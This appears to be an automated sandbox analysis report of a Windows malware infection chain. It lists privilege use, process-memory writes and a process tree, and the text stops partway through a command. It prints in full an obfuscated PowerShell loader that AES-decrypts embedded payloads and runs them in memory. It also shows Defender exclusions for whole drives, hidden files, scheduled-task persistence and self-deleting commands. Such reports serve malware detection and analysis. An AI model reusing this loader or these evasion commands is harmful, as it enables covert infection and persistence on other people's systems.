Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeIncreaseQuotaPrivilege 4964 powershell.exe Token: SeSecurityPrivilege 4964 powershell.exe Token: SeTakeOwnershipPrivilege 4964 powershell.exe Token: SeLoadDriverPrivilege 4964 powershell.exe Token: SeSystemProfilePrivilege 4964 powershell.exe Token: SeSystemtimePrivilege 4964 powershell.exe Token: SeProfSingleProcessPrivilege 4964 powershell.exe Token: SeIncBasePriorityPrivilege 4964 powershell.exe Token: SeCreatePagefilePrivilege 4964 powershell.exe Token: SeBackupPrivilege 4964 powershell.exe Token: SeRestorePrivilege 4964 powershell.exe Token: SeShutdownPrivilege 4964 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeSystemEnvironmentPrivilege 4964 powershell.exe Token: SeRemoteShutdownPrivilege 4964 powershell.exe Token: SeUndockPrivilege 4964 powershell.exe Token: SeManageVolumePrivilege 4964 powershell.exe Token: 33 4964 powershell.exe Token: 34 4964 powershell.exe Token: 35 4964 powershell.exe Token: 36 4964 powershell.exe Token: SeIncreaseQuotaPrivilege 4964 powershell.exe Token: SeSecurityPrivilege 4964 powershell.exe Token: SeTakeOwnershipPrivilege 4964 powershell.exe Token: SeLoadDriverPrivilege 4964 powershell.exe Token: SeSystemProfilePrivilege 4964 powershell.exe Token: SeSystemtimePrivilege 4964 powershell.exe Token: SeProfSingleProcessPrivilege 4964 powershell.exe Token: SeIncBasePriorityPrivilege 4964 powershell.exe Token: SeCreatePagefilePrivilege 4964 powershell.exe Token: SeBackupPrivilege 4964 powershell.exe Token: SeRestorePrivilege 4964 powershell.exe Token: SeShutdownPrivilege 4964 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeSystemEnvironmentPrivilege 4964 powershell.exe Token: SeRemoteShutdownPrivilege 4964 powershell.exe Token: SeUndockPrivilege 4964 powershell.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
pid Process 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 4436 stories.tmp 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 2160 am209.exe 1360 33c3247dda.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1444 explorer.exe 5892 newwork.tmp -
Suspicious use of SendNotifyMessage 33 IoCs
pid Process 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 1360 33c3247dda.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 4224 firefox.exe 1360 33c3247dda.exe 1360 33c3247dda.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4224 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4512 wrote to memory of 3176 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 82 PID 4512 wrote to memory of 3176 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 82 PID 4512 wrote to memory of 3176 4512 2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe 82 PID 3176 wrote to memory of 2736 3176 skotes.exe 83 PID 3176 wrote to memory of 2736 3176 skotes.exe 83 PID 2736 wrote to memory of 4052 2736 DU1zDwm.exe 84 PID 2736 wrote to memory of 4052 2736 DU1zDwm.exe 84 PID 2736 wrote to memory of 4548 2736 DU1zDwm.exe 85 PID 2736 wrote to memory of 4548 2736 DU1zDwm.exe 85 PID 2736 wrote to memory of 2184 2736 DU1zDwm.exe 86 PID 2736 wrote to memory of 2184 2736 DU1zDwm.exe 86 PID 2736 wrote to memory of 4480 2736 DU1zDwm.exe 89 PID 2736 wrote to memory of 4480 2736 DU1zDwm.exe 89 PID 4480 wrote to memory of 1088 4480 powershell.exe 92 PID 4480 wrote to memory of 1088 4480 powershell.exe 92 PID 3176 wrote to memory of 3212 3176 skotes.exe 93 PID 3176 wrote to memory of 3212 3176 skotes.exe 93 PID 3176 wrote to memory of 3212 3176 skotes.exe 93 PID 3212 wrote to memory of 4436 3212 stories.exe 94 PID 3212 wrote to memory of 4436 3212 stories.exe 94 PID 3212 wrote to memory of 4436 3212 stories.exe 94 PID 4436 wrote to memory of 628 4436 stories.tmp 95 PID 4436 wrote to memory of 628 4436 stories.tmp 95 PID 4436 wrote to memory of 628 4436 stories.tmp 95 PID 4436 wrote to memory of 1904 4436 stories.tmp 97 PID 4436 wrote to memory of 1904 4436 stories.tmp 97 PID 4436 wrote to memory of 1904 4436 stories.tmp 97 PID 628 wrote to memory of 1944 628 net.exe 98 PID 628 wrote to memory of 1944 628 net.exe 98 PID 628 wrote to memory of 1944 628 net.exe 98 PID 3176 wrote to memory of 2032 3176 skotes.exe 103 PID 3176 wrote to memory of 2032 3176 skotes.exe 103 PID 3176 wrote to memory of 2032 3176 skotes.exe 103 PID 2032 wrote to memory of 2012 2032 cmd.exe 105 PID 2032 wrote to memory of 2012 2032 cmd.exe 105 PID 2032 wrote to memory of 2012 2032 cmd.exe 105 PID 2032 wrote to memory of 216 2032 cmd.exe 106 PID 2032 wrote to memory of 216 2032 cmd.exe 106 PID 2032 wrote to memory of 216 2032 cmd.exe 106 PID 216 wrote to memory of 1104 216 powershell.exe 108 PID 216 wrote to memory of 1104 216 powershell.exe 108 PID 216 wrote to memory of 1104 216 powershell.exe 108 PID 3176 wrote to memory of 732 3176 skotes.exe 109 PID 3176 wrote to memory of 732 3176 skotes.exe 109 PID 3176 wrote to memory of 732 3176 skotes.exe 109 PID 732 wrote to memory of 2880 732 rhnew.exe 112 PID 732 wrote to memory of 2880 732 rhnew.exe 112 PID 732 wrote to memory of 2880 732 rhnew.exe 112 PID 732 wrote to memory of 2880 732 rhnew.exe 112 PID 732 wrote to memory of 2880 732 rhnew.exe 112 PID 216 wrote to memory of 3216 216 powershell.exe 114 PID 216 wrote to memory of 3216 216 powershell.exe 114 PID 216 wrote to memory of 3216 216 powershell.exe 114 PID 3176 wrote to memory of 3520 3176 skotes.exe 118 PID 3176 wrote to memory of 3520 3176 skotes.exe 118 PID 3176 wrote to memory of 3520 3176 skotes.exe 118 PID 3520 wrote to memory of 3588 3520 abc488b187.exe 119 PID 3520 wrote to memory of 3588 3520 abc488b187.exe 119 PID 3520 wrote to memory of 3588 3520 abc488b187.exe 119 PID 216 wrote to memory of 3436 216 powershell.exe 56 PID 216 wrote to memory of 2164 216 powershell.exe 39 PID 216 wrote to memory of 1768 216 powershell.exe 31 PID 216 wrote to memory of 1964 216 powershell.exe 35 PID 216 wrote to memory of 4524 216 powershell.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4052 attrib.exe 4548 attrib.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe2⤵PID:4692
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exeC:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5084 -
C:\Windows\explorer.exeexplorer.exe3⤵
- Suspicious use of FindShellTrayWindow
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3572 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe2⤵PID:1860
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exeC:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:348 -
C:\Windows\explorer.exeexplorer.exe3⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4704 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.1.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exeC:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe2⤵
- Executes dropped EXE
PID:6016
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1336
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2492
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:6072
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe"C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe5⤵
- Views/modifies file attributes
PID:4052
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe5⤵
- Views/modifies file attributes
PID:4548
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE5⤵
- Scheduled Task/Job: Scheduled Task
PID:2184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del DU1zDwm.exe5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\is-HNV6R.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-HNV6R.tmp\stories.tmp" /SL5="$C0222,3307684,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause video_jet_12326⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause video_jet_12327⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
-
C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe"C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1904
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:3268 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 